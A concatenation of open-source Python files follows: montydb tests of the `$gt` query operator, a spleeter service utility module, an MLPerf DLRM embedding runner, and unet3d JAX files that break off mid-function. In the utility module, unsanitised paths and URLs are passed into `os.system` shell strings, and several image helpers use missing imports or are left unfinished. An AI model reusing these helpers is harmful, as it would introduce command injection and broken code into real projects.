def test_qop_gt_17(monty_find, mongo_find):
docs = [
{"a": [1, 3]},
{"a": 2}
]
spec = {"a": {"$gt": [1]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_18(monty_find, mongo_find):
docs = [
{"a": [1, 3]},
{"a": 2}
]
spec = {"a": {"$gt": [2]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_gt_19(monty_find, mongo_find):
docs = [
{"a": [None]},
{"a": 2}
]
spec = {"a": {"$gt": []}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_20(monty_find, mongo_find):
long_ = bson.Int64(10)
int_ = 10
float_ = 10.0
decimal_ = bson.Decimal128("10.0")
docs = [
{"a": long_},
{"a": int_},
{"a": float_},
{"a": decimal_}
]
spec = {"a": {"$gt": 9.5}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 4
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(4):
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_21(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")}
]
spec = {"a": {"$gt": bson.Decimal128("0")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_22(monty_find, mongo_find):
bin_0 = bson.Binary(b"0")
bin_1 = bson.Binary(b"1")
byt_0 = b"0"
byt_1 = b"1"
docs = [
{"a": bin_0},
{"a": bin_1},
{"a": byt_0},
{"a": byt_1}
]
spec = {"a": {"$gt": bin_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2 if PY3 else 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
if PY3:
for i in range(2):
assert next(mongo_c) == next(monty_c)
else:
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_23(monty_find, mongo_find):
bin_0 = bson.Binary(b"0")
bin_1 = bson.Binary(b"1")
byt_0 = b"0"
byt_1 = b"1"
docs = [
{"a": bin_0},
{"a": bin_1},
{"a": byt_0},
{"a": byt_1}
]
spec = {"a": {"$gt": byt_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2 if PY3 else 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
if PY3:
for i in range(2):
assert next(mongo_c) == next(monty_c)
else:
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_24(monty_find, mongo_find):
code_0 = bson.Code("0")
code_1 = bson.Code("1")
docs = [
{"a": code_0},
{"a": code_1}
]
spec = {"a": {"$gt": code_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_25(monty_find, mongo_find):
code_0 = bson.Code("0")
code_1 = bson.Code("1")
code_1s = bson.Code("1", {})
docs = [
{"a": code_1},
{"a": code_1s}
]
spec = {"a": {"$gt": code_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_26(monty_find, mongo_find):
code_0s = bson.Code("0", {})
code_1s = bson.Code("1", {})
docs = [
{"a": code_0s},
{"a": code_1s}
]
spec = {"a": {"$gt": code_0s}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_27(monty_find, mongo_find):
code_1as = bson.Code("1", {"a": 5})
code_1bs = bson.Code("1", {"b": 5})
code_1cs = bson.Code("1", {"c": 5})
docs = [
{"a": code_1as},
{"a": code_1bs},
{"a": code_1cs}
]
spec = {"a": {"$gt": code_1bs}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_28(monty_find, mongo_find):
regex_0 = bson.Regex("^0")
regex_a = bson.Regex("^a")
docs = [
{"a": regex_a},
]
spec = {"a": {"$gt": regex_0}}
monty_c = monty_find(docs, spec)
# Can't have RegEx as arg to predicate
with pytest.raises(OperationFailure):
next(monty_c)
@skip_if_no_bson
def test_qop_gt_29(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gt": bson.Decimal128("NaN")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_gt_30(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gt": bson.Decimal128("-NaN")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_gt_31(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gt": bson.Decimal128("Infinity")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_gt_32(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gt": 0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 3
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(3):
assert next(mongo_c) == next(monty_c)
``` |
{
"source": "jqueguiner/spleeter-as-a-service",
"score": 3
} |
#### File: spleeter-as-a-service/src/app_utils.py
```python
import os
import requests
import random
import _thread as thread
from uuid import uuid4
import urllib.parse as urlparse
import numpy as np
import zipfile
from pyunpack import Archive
from shutil import rmtree
def download(url, filename):
data = requests.get(url).content
with open(filename, 'wb') as handler:
handler.write(data)
return filename
def generate_random_filename(upload_directory, extension):
filename = str(uuid4())
filename = os.path.join(upload_directory, filename + "." + extension)
return filename
def clean_me(filename):
if os.path.exists(filename):
if os.path.isfile(filename):
os.remove(filename)
else:
rmtree(filename)
def clean_all(files):
for me in files:
clean_me(me)
def create_directory(path):
os.system("mkdir -p %s" % os.path.dirname(path))
def get_model_bin(url, output_path):
if not os.path.exists(output_path):
create_directory(output_path)
filename, ext = os.path.splitext(os.path.basename(urlparse.urlsplit(url).path))
if not os.path.exists(os.path.join(output_path, filename, ext)):
print("downloading model :" + filename + ext)
cmd = "wget -O %s %s" % (output_path, url)
os.system(cmd)
return output_path
#model_list = [(url, output_path), (url, output_path)]
def get_multi_model_bin(model_list):
for m in model_list:
thread.start_new_thread(get_model_bin, m)
def unzip(path_to_zip_file, directory_to_extract_to='.'):
print("deflating model :" + path_to_zip_file)
with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
zip_ref.extractall(directory_to_extract_to)
def unrar(path_to_rar_file, directory_to_extract_to='.'):
print("deflating model :" + path_to_rar_file)
Archive(path_to_rar_file).extractall(directory_to_extract_to)
def resize_img_in_folder(path, w, h):
dirs = os.listdir(path)
for item in dirs:
if os.path.isfile(path+item):
im = Image.open(path+item)
f, e = os.path.splitext(path+item)
imResize = im.resize((w, h), Image.ANTIALIAS)
imResize.save(f + '.jpg', 'JPEG', quality=90)
def resize_img(path, w, h):
img = mpimg.imread(path)
img = cv2.resize(img, dsize=(w, h))
return img
def square_center_crop(image_path, output_path):
im = Image.open(image_path)
width, height = im.size
new_width = min(width, height)
new_height = new_width
left = (width - new_width)/2
top = (height - new_height)/2
right = (width + new_width)/2
bottom = (height + new_height)/2
def image_crop(image_path, output_path, x0, y0, x1, y1):
"""
The syntax is the following:
cropped = img.crop( ( x, y, x + width , y + height ) )
x and y are the top left coordinate on image;
x + width and y + height are the width and height respectively of the region that you want to crop starting at x and ypoint.
Note: x + width and y + height are the bottom right coordinate of the cropped region.
"""
image = cv2.imread(image_path)
print(x0, y0, x1, y1)
crop = image[y0:y1, x0:x1]
print(crop)
cv2.imwrite(output_path, crop)
``` |
{
"source": "jqueguiner/training_results_v1.0",
"score": 2
} |
#### File: implementations/dlrm-preview-TF-tpu-v4-256/dlrm_embedding_runner.py
```python
from absl import flags
import tensorflow.compat.v1 as tf
from REDACTED.tensorflow.python.tpu import tpu
from REDACTED.tensorflow.python.tpu import tpu_embedding_gradient
from REDACTED.tensorflow.python.tpu import tpu_function
from REDACTED.tensorflow.python.tpu import training_loop
from REDACTED.tensorflow.python.tpu.ops import tpu_ops
from REDACTED.mlperf.submissions.training.v1_0.models.util import train_and_eval_runner as tr
FLAGS = flags.FLAGS
class DLRMEmbeddingRunner(tr.TrainAndEvalRunner):
"""Augmentation of the TrainAndEvalRunner with embedding support.
This class uses the TPUEmbedding library as an API for organizing embedding
metadata for:
1. Configuration
2. Building infeed ops
3. Buidling embedding table load/restore ops
4. Building an embedding update/train op.
Attributes:
sparse_features_key: String key used for all embedding features. This class
requires all embedding features to be keyed under this string. This is
necessary for the runner to properly strip away only those features and
enqueue them properly.
embedding: TPUEmbedding object representing the table and feature config.
This attribute is required.
**kwargs: See TrainAndEvalRunner.
"""
def __init__(self, sparse_features_key, embedding, **kwargs):
"""Initializes the runner."""
super(DLRMEmbeddingRunner, self).__init__(**kwargs, do_initialize=False)
self.embedding = embedding
self.embedding_config = embedding.config_proto
self.features_key = sparse_features_key
self.embed_vars_and_ops = None
self.retrieve_ops = None
self.enqueue_datas_list = {True: [], False: []}
self.dummy_variables = None
self.dummy_variables_init = None
self.num_outfeeds = 1
with self.graph.as_default():
self.embed_vars_and_ops = self.embedding.create_variables_and_ops()
self.dummy_variables, self.dummy_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(self.embedding))
self.device_topology = tf.Session(
self.master, config=self.config).run(
tpu.initialize_system(embedding_config=self.embedding_config))
def eval_step(self, step_num, preds):
"""One evaluation step."""
inp = self.infeed_op[False].generate_dequeue_op()
flatten_structure = tf.nest.flatten(self.feature_structure[False])
inp = [
tf.slice(i, [0] * i.shape.ndims, j.shape)
for i, j in zip(inp, flatten_structure)
]
eval_has_labels = False
if eval_has_labels:
features, labels = tf.nest.pack_sequence_as(self.feature_structure[False],
inp)
else:
features = tf.nest.pack_sequence_as(self.feature_structure[False], inp)
labels = None
self.maybe_add_embedding_features(features, False)
_, self.predict_output = self.model_fn(features, labels, False, step_num,
preds)
for _ in self.predict_output:
self.dequeue_ops.append([])
with tf.device(tr.device_for_tpu_core(self.get_host(0))):
return step_num + 1, self.predict_output["results"]
@tpu_function.on_device_training_loop
def eval_loop(self, _):
per_replica_eval_batch_size = self.eval_batch_size // self.num_replicas
tf.get_variable_scope().reuse_variables()
predictions = tf.zeros([self.eval_steps, per_replica_eval_batch_size, 2])
_, predictions = training_loop.repeat(
int(self.eval_steps), self.eval_step, [tf.constant(0), predictions])
with tf.control_dependencies([tpu_ops.outfeed_enqueue_tuple([predictions])
]):
return tf.no_op()
def maybe_capture_embedding_inputs(self, inputs, is_training):
"""Removes sparse inputs and stores them.
Args:
inputs: Dict of input features, resulting from iterator.get_next().
is_training: Boolean that is True for training and False otherwise.
"""
sparse_inputs = inputs.pop(self.features_key)
sparse_inputs = tf.split(sparse_inputs, sparse_inputs.shape[-1], axis=1)
sparse_inputs = [tf.squeeze(x) for x in sparse_inputs]
self.enqueue_datas_list[is_training].append(sparse_inputs)
def maybe_add_embedding_enqueue_ops_int(self, is_training, enqueue_ops):
"""Adds embedding input enqueue ops.
Args:
is_training: Boolean that is True for training and False otherwise.
enqueue_ops: List of existing enqueue ops used by the runner.
"""
sparse_enqueue_ops = []
for i, batch_data in enumerate(self.enqueue_datas_list[is_training]):
enqueue_op = tpu_ops.enqueue_tpu_embedding_integer_batch(
batch=batch_data,
device_ordinal=i % FLAGS.replicas_per_host,
mode_override="inference" if not is_training else None)
sparse_enqueue_ops.append(enqueue_op)
enqueue_ops.extend(sparse_enqueue_ops)
# Clear sparse input list for this host.
del self.enqueue_datas_list[is_training][:]
def maybe_get_embedding_train_op(self):
"""Builds embedding table update op.
Returns:
An op which computes gradients and updates tables.
"""
with tf.device(tr.device_for_tpu_core(self.get_host(0))):
sparse_grads = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
self.embedding))
embedding_train_op = self.embedding.generate_send_gradients_op(
sparse_grads, tf.compat.v1.train.get_global_step())
return embedding_train_op
def maybe_add_embedding_features(self, features, hook_dummy_variables):
"""Adds sparse activations to feature list.
Args:
features: Dict of features, used by the model_fn.
hook_dummy_variables: Boolean telling whether to back-propagate through
embedding activations. Set to true when training and desiring backprop
to extend to the embedding tables.
"""
if hook_dummy_variables:
with tf.device(tr.device_for_tpu_core(self.get_host(0))):
embedding_activations = self.embedding.get_activations()
new_embedding_activations = tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
self.embedding, embedding_activations, self.dummy_variables)
features.update(new_embedding_activations)
else:
embedding_activations = self.embedding.get_activations()
features.update(embedding_activations)
def maybe_load_embedding_vars(self):
"""Loads tables into accelerator device memory."""
self.sess.run(self.dummy_variables_init)
self.sess.run(self.embed_vars_and_ops.load_ops())
self.retrieve_ops = self.embed_vars_and_ops.retrieve_ops()
def should_set_training_metric(self):
return False
def retrieve_embedding_vars(self):
self.sess.run(self.retrieve_ops)
```
#### File: unet3d-preview-JAX-tpu-v4-128/google/test_deterministic_input.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
import math
import time
from absl import app
from absl import flags
from absl import logging
import jax
from jax import config
import jax.numpy as jnp
from jax.util import partial
import numpy as onp
import tensorflow.compat.v2 as tf
import REDACTED.learning.deepmind.REDACTED.client.google as xm
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.data_loading import data_loader
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.data_loading import input_reader
# Import below lines so that we do not have flag errors when reusing the same
# REDACTED file.
# pylint: disable=unused-import
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.runtime import arguments
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.runtime import inference
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.runtime import training
# pylint: enable=unused-import
flags.DEFINE_string(
'init_dummy_file',
default=None,
help='Read a dummy file to initialize datacenter connection.')
flags.DEFINE_bool(
'space_filling_device_assignment', default=False,
help='Make device assignment with space filling curves.')
flags.DEFINE_bool(
'hardware_rng', default=True,
help='Enable faster RNG generation.')
flags.DEFINE_bool(
'profile', default=True,
help='Enable programmatic profile with xprof.')
flags.DEFINE_bool(
'profile_first_eval', default=True,
help='Enable programmatic profile with xprof for eval.')
flags.DEFINE_integer(
'repeat_experiment', default=1, help=('Number of runs'))
flags.DEFINE_integer(
'profile_duration', default=15, help=('Xprof profile duration'))
flags.DEFINE_integer(
'profile_latency', default=15, help=('When to start profiling.'))
flags.DEFINE_integer(
'num_partitions', default=1, help=('Number of partitions in SPMD.'))
flags.DEFINE_integer(
'num_eval_partitions', default=1, help=('Number of partitions in SPMD.'))
flags.DEFINE_string(
'experiment_name', help='name of the experiment', default='')
flags.DEFINE_string(
'experiment_dir', help='directory of the experiment', default='')
# Adds jax_log_compiles flag to print compilation logs on the jax side.
config.parse_flags_with_absl()
FLAGS = flags.FLAGS
mypmap = partial(jax.pmap, axis_name='hosts')
@mypmap
def host_psum(x):
return jax.lax.psum(x, 'hosts')
def per_host_sum_pmap(in_tree):
"""Execute sum on in_tree's leaves over ICI."""
ldc = jax.local_device_count()
def pre_pmap(x):
y = onp.zeros((ldc, *x.shape), dtype=x.dtype)
y[0] = x
return y
def post_pmap(x):
return jax.device_get(x)[0]
return jax.tree_map(post_pmap, host_psum(jax.tree_map(pre_pmap, in_tree)))
def construct_run_config():
"""Construct the run config parameters.
Returns:
A dictionary containing run parameters.
"""
if FLAGS.use_eval_device_loop:
# Eval device loop does not support spmd.
assert FLAGS.num_eval_partitions == 1
num_cores = jax.local_device_count() * jax.host_count()
num_replicas = num_cores // FLAGS.num_partitions
num_eval_replicas = num_cores // FLAGS.num_eval_partitions
dtype = jnp.bfloat16 if FLAGS.use_bfloat16 else jnp.float32
# steps_per_epoch = ceil(168 / 32) = 6 for bs=32
num_steps_per_epoch = math.ceil(FLAGS.num_train_images / FLAGS.batch_size)
# 192 for 6 * 32 for bs=32
samples_per_epoch = num_steps_per_epoch * FLAGS.batch_size
# Stil provide the parameters as original,
# max 10K epochs, 10K * 168 samples to converge,
# first epoch is at 1000, and evaluate every 20 epochs.
# Warmup epochs is 1000, meaning 168 & 1000 samples.
# start_eval_at = 1000
# epochs = 10000
# evaluate_every = 20
macro_step_sizes = []
# first_eval_epoch = 875, ceil(168 * 1000 / 198)
first_eval_epoch = math.ceil(FLAGS.num_train_images * FLAGS.start_eval_at /
samples_per_epoch)
# first_eval_step = 875 * 6
first_eval_step = first_eval_epoch * num_steps_per_epoch
# later_eval_epoch_frequency = 18, ceil(168 * 20 / 192)
later_eval_epoch_frequency = math.ceil(FLAGS.num_train_images *
FLAGS.evaluate_every /
samples_per_epoch)
# later_eval_step_frequency = 18 * 6 = 108
later_eval_step_frequency = later_eval_epoch_frequency * num_steps_per_epoch
# macro_step_sizes = [5250, 108]
macro_step_sizes = [first_eval_step, later_eval_step_frequency]
# 6 steps are called an epoch
# No crosshost spmd for eval.
host_eval_batch_size = FLAGS.eval_batch_size // jax.host_count()
assert host_eval_batch_size > 0
replica_eval_batch_size = FLAGS.eval_batch_size // num_eval_replicas
assert replica_eval_batch_size > 0
num_host_eval_replicas = jax.local_device_count() // FLAGS.num_eval_partitions
assert num_host_eval_replicas > 0
local_num_replicas = jax.local_device_count() // FLAGS.num_partitions
local_num_replicas = max(1, local_num_replicas)
hosts_per_replicas = FLAGS.num_partitions // jax.local_device_count()
hosts_per_replicas = max(1, hosts_per_replicas)
replica_batch_size = FLAGS.batch_size // num_replicas
replicas_per_hosts = jax.local_device_count() // FLAGS.num_partitions
replicas_per_hosts = max(1, replicas_per_hosts)
host_batch_size = replicas_per_hosts * replica_batch_size
num_eval_steps = math.ceil(
input_reader.NUM_SLIDING_WINDOWS / FLAGS.eval_batch_size)
return dict(
use_train_device_loop=FLAGS.use_train_device_loop,
use_eval_device_loop=FLAGS.use_eval_device_loop,
make_sliding_windows_in_dataset=True,
num_eval_images=FLAGS.num_eval_images,
eval_score_fn_bs=FLAGS.eval_score_fn_bs,
num_eval_steps=num_eval_steps,
# Global batch size for eval, has to be multiple of host_count.
eval_batch_size=FLAGS.eval_batch_size,
# Per host eval batch size.
host_eval_batch_size=host_eval_batch_size,
# Per replica eval batch size.
replica_eval_batch_size=replica_eval_batch_size,
# Number of global eval replicas
num_eval_replicas=num_eval_replicas,
num_host_eval_replicas=num_host_eval_replicas,
num_train_images=FLAGS.num_train_images,
num_eval_partitions=FLAGS.num_eval_partitions,
num_partitions=FLAGS.num_partitions,
use_spatial_partitioning=FLAGS.num_partitions > 1,
local_num_replicas=local_num_replicas,
hosts_per_replicas=hosts_per_replicas,
num_cores=num_cores,
macro_step_sizes=macro_step_sizes,
num_steps_per_epoch=num_steps_per_epoch,
samples_per_epoch=samples_per_epoch,
num_local_devices=jax.local_device_count(),
device_batch_size=replica_batch_size,
host_batch_size=host_batch_size,
num_replicas=num_replicas,
data_dir=FLAGS.data_dir,
epochs=FLAGS.epochs,
batch_size=FLAGS.batch_size,
layout=FLAGS.layout,
input_shape=FLAGS.input_shape,
input_shape_without_channel=FLAGS.input_shape[:-1],
val_input_shape=FLAGS.val_input_shape,
val_input_shape_without_channel=FLAGS.val_input_shape[:-1],
seed=FLAGS.seed,
exec_mode=FLAGS.exec_mode,
use_bfloat16=FLAGS.use_bfloat16,
optimizer=FLAGS.optimizer,
learning_rate=FLAGS.learning_rate,
init_learning_rate=FLAGS.init_learning_rate,
lr_warmup_epochs=FLAGS.lr_warmup_epochs,
lr_decay_epochs=FLAGS.lr_decay_epochs,
lr_decay_factor=FLAGS.lr_decay_factor,
lamb_beta1=FLAGS.lamb_betas[0],
lamb_beta2=FLAGS.lamb_betas[1],
momentum=FLAGS.momentum,
weight_decay=FLAGS.weight_decay,
evaluate_every=FLAGS.evaluate_every,
normalization=FLAGS.normalization,
activation=FLAGS.activation,
pad_mode=FLAGS.pad_mode,
oversampling=FLAGS.oversampling,
include_background=FLAGS.include_background,
dtype=dtype,
in_channels=1,
n_class=3,
shuffle_buffer_size=FLAGS.num_train_images,
interleave_cycle_length=32,
num_hosts=jax.host_count(),
host_index=jax.host_id(),
overlap=FLAGS.overlap,
eval_mode='gaussian',
padding_val=-2.2,
eval_padding_mode='constant', # to be used in eval sliding windows.
use_fake_data=FLAGS.use_fake_data,
fake_nan_data=False,
use_fake_train_data=False,
num_eval_passes=FLAGS.num_eval_passes,
eval_image_indices=FLAGS.eval_image_indices,
)
def main(argv):
# BEGIN GOOGLE-INTERNAL
xm.setup_work_unit()
# END GOOGLE-INTERNAL
del argv
tf.enable_v2_behavior()
params = construct_run_config()
logging.info('Experiment params: %s', params)
for _ in range(FLAGS.repeat_experiment):
run_unet(params)
def run_unet(params):
"""Runs a single end to end unet experiment."""
logging.info('params:%s', params)
host_id = params['host_index']
params['training_num_hosts'] = params['num_replicas']
params['training_host_index'] = 2
if FLAGS.seed >= 0:
seed = FLAGS.seed
else:
seed = onp.uint32(time.time() if host_id == 0 else 0)
seed = onp.int64(per_host_sum_pmap(seed))
tf.random.set_seed(seed)
train_dataloader, _ = data_loader.get_data_loaders(
FLAGS.data_dir, params)
train_dataset = train_dataloader(params)
train_iterator = iter(train_dataset)
for step in range(params['epochs']):
my_ti = next(train_iterator)
# pylint: disable=cell-var-from-loop
my_ti = jax.tree_map(lambda x: x.numpy(), my_ti)
# pylint: enable=cell-var-from-loop
ti = per_host_sum_pmap(my_ti)
ti = jax.tree_map(lambda x: x / params['num_hosts'], ti)
for key in ['image', 'label']:
my_ti[key] = my_ti[key] - ti[key]
diff = math.fabs(onp.sum(my_ti[key]))
if diff < 0.0001:
logging.info('step:%s host:%s key:%s np.sum(my_ti[key]):%s',
step, host_id, key, diff)
else:
logging.error('step:%s host:%s key:%s np.sum(my_ti[key]):%s', step,
host_id, key, diff)
if __name__ == '__main__':
app.run(main)
```
#### File: unet3d-preview-JAX-tpu-v4-128/models/losses_numpy.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
import numpy as np
def softmax(x):
return np.exp(x) / np.exp(x).sum(-1, keepdims=True)
def cross_entropy_loss(logits: np.ndarray,
one_hot_labels: np.ndarray) -> np.ndarray:
"""Returns the cross entropy loss between some logits and some labels.
Args:
logits: Output of the model.
one_hot_labels: One-hot encoded labels. Dimensions should match the logits.
Returns:
The cross entropy, averaged over the first dimension (samples).
"""
log_softmax_logits = np.log(softmax(logits))
loss = -np.sum(one_hot_labels * log_softmax_logits, axis=-1)
return np.mean(loss)
def compute_dice(prediction,
target,
to_onehot_y=True,
to_onehot_x=False,
use_softmax=True,
use_argmax=False,
include_background=False,
layout="NDHWC"):
"""Returns the dice coefficient between prediction and target.
Args:
prediction: Prediction.
target: Target.
to_onehot_y:
to_onehot_x:
use_softmax: Whether to use softmax.
use_argmax: Whether to use argmax.
include_background: Whether to include background.
layout:
Returns:
The dice coefficient which is essentially a measure of overlap between two
samples.
"""
smooth_nr = 1e-6
smooth_dr = 1e-6
if layout == "NCDHW":
channel_axis = 1
reduce_axis = tuple(list(range(2, len(prediction.shape))))
else:
channel_axis = -1
reduce_axis = tuple(list(range(1, len(prediction.shape) - 1)))
num_pred_ch = prediction.shape[channel_axis]
if use_softmax:
prediction = softmax(prediction)
elif use_argmax:
prediction = np.argmax(prediction, axis=channel_axis)
if to_onehot_y:
target = to_one_hot(target, layout, channel_axis)
if to_onehot_x:
prediction = to_one_hot(prediction, layout, channel_axis)
if not include_background:
assert num_pred_ch > 1, \
(f"To exclude background the prediction needs more than one channel. "
f"Got {num_pred_ch}.")
if layout == "NCDHW":
target = target[:, 1:]
prediction = prediction[:, 1:]
else:
target = target[..., 1:]
prediction = prediction[..., 1:]
assert (target.shape == prediction.shape), \
(f"Target and prediction shape do not match. Target: ({target.shape}), "
f"prediction: ({prediction.shape}).")
intersection = np.sum(target * prediction, axis=reduce_axis)
target_sum = np.sum(target, axis=reduce_axis)
prediction_sum = np.sum(prediction, axis=reduce_axis)
dice = (2.0 * intersection + smooth_nr) / (
target_sum + prediction_sum + smooth_dr)
return dice
def to_one_hot(array, layout, channel_axis):
if len(array.shape) >= 5:
array = np.squeeze(array, axis=channel_axis)
array = np.array(array[..., np.newaxis] == np.arange(3), dtype=np.float32)
if layout == "NCDHW":
array = np.transpose(array, (0, 4, 1, 2, 3))
return array
def compute_dice_ce_loss(y_pred,
y_true,
to_onehot_y,
use_softmax,
layout,
include_background=False):
"""Returns the average of the dice coeffcient and cross entropy.
Args:
y_pred: Prediction.
y_true: Target.
to_onehot_y:
use_softmax: Whether to use softmax.
layout:
include_background: Whether to include background.
Returns:
The average of the dice coeffcient and cross entropy.
"""
dice = 1.0 - np.mean(
compute_dice(
y_pred,
y_true,
to_onehot_y=to_onehot_y,
use_softmax=use_softmax,
include_background=include_background))
if layout == "NCDHW":
channel_axis = 1
else:
channel_axis = -1
cross_entropy = cross_entropy_loss(y_pred,
to_one_hot(y_true, layout, channel_axis))
return (dice + cross_entropy) / 2
def compute_dice_score(y_pred,
y_true,
to_onehot_y=True,
use_argmax=True,
layout="NDHWC",
include_background=False,
compute_mean_score=True):
"""CPU compute dice score."""
dice_scores = compute_dice(
y_pred,
y_true,
to_onehot_y=to_onehot_y,
to_onehot_x=True,
use_softmax=False,
use_argmax=use_argmax,
layout=layout,
include_background=include_background)
if compute_mean_score:
return np.mean(dice_scores, axis=0)
else:
return dice_scores
```
#### File: unet3d-preview-JAX-tpu-v4-128/models/unet3d.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
from flax import nn
import jax
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.models import layers
# pylint: disable=g-complex-comprehension
class Unet3D(nn.Module):
"""Unet3D class."""
def apply(self, x, in_channels, n_class, normalization, activation,
print_func=layers.ignore_print):
filters = [32, 64, 128, 256, 320]
inp = filters[:-1]
out = filters[1:]
input_dim = filters[0]
input_block = layers.InputBlock.partial(
in_channels=in_channels,
out_channels=input_dim,
normalization=normalization,
activation=activation,
print_func=print_func)
downsample_fns = [
layers.DownsampleBlock.partial(
in_channels=i,
out_channels=o,
normalization=normalization,
activation=activation,
print_func=print_func) for i, o in zip(inp, out)
]
bottleneck = layers.DownsampleBlock.partial(
in_channels=filters[-1],
out_channels=filters[-1],
normalization=normalization,
activation=activation,
print_func=print_func)
upsample_fns = [
layers.UpsampleBlock.partial(
in_channels=filters[-1],
out_channels=filters[-1],
normalization=normalization,
activation=activation,
print_func=print_func)
]
upsample_fns.extend([
layers.UpsampleBlock.partial(
in_channels=i,
out_channels=o,
normalization=normalization,
activation=activation,
print_func=print_func)
for i, o in zip(reversed(out), reversed(inp))
])
output = layers.OutputLayer.partial(in_channels=input_dim, n_class=n_class,
print_func=print_func)
# Introduce no-op jitted functions, so that profiler can show them in stacks
# pylint: disable=unnecessary-lambda,cell-var-from-loop
@jax.jit
def jinput_block(y):
return input_block(y, tensor_name="input")
x = jinput_block(x)
outputs = [x]
down_index = 0
